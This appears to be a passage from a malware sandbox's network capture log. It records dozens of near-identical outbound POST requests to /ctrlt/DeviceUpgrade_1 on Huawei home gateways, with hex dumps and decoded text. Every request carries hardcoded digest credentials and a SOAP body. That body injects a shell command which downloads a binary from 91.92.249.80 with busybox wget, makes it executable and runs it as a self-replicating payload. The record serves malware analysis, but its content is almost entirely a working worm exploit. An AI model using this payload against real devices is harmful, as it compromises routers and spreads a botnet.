                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2106192.168.2.234521841.191.90.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.615314007 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2107192.168.2.235755441.254.192.11337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.615508080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2108192.168.2.2346716219.40.30.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.616879940 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2109192.168.2.2342308164.210.194.8937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.616976976 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2110192.168.2.2346720175.14.191.21837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.617002964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2111192.168.2.2357450175.244.113.20937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.617117882 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2112192.168.2.2356374157.12.13.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.617499113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2113192.168.2.2360810126.0.156.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.617558956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2114192.168.2.234336641.245.147.1737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.618740082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2115192.168.2.235306079.157.244.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.618756056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
